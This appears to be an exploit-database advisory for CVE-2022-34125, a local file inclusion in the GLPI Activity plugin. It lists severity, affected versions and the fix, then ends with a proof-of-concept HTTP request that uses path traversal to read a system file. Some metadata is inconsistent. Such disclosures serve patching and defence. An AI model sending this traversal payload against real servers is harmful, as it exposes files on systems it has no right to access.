GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin

vendor:

GLPI Activity

by:

Nuri Çilengir

6.5

CVSS

MEDIUM

Authenticated Local File Inclusion

CWE

Product Name: GLPI Activity

Affected Version From: GLPI Activity < 3.1.0

Affected Version To: GLPI Activity < 3.1.1

Patch Exists: YES

Related CWE: CVE-2022-34125

CPE: a:glpi_project:glpi_activity:3.1.0

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu 22.04

2022

GLPI Activity v3.1.0 – Authenticated Local File Inclusion on Activity plugin

The GLPI Activity plugin version 3.1.0 and earlier is vulnerable to an authenticated local file inclusion vulnerability. An attacker can exploit this vulnerability to read arbitrary files from the target system.

Mitigation:

Update to GLPI Activity version 3.1.1 or later.

Source

Exploit-DB raw data:

# Exploit Title: GLPI Activity  v3.1.0 - Authenticated Local File Inclusion on Activity plugin
# Date of found: 11 Jun 2022
# Application: GLPI Activity < 3.1.0
# Author: Nuri Çilengir 
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/InfotelGLPI/activity
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-34125

# PoC
GET /marketplace/activity/front/cra.send.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close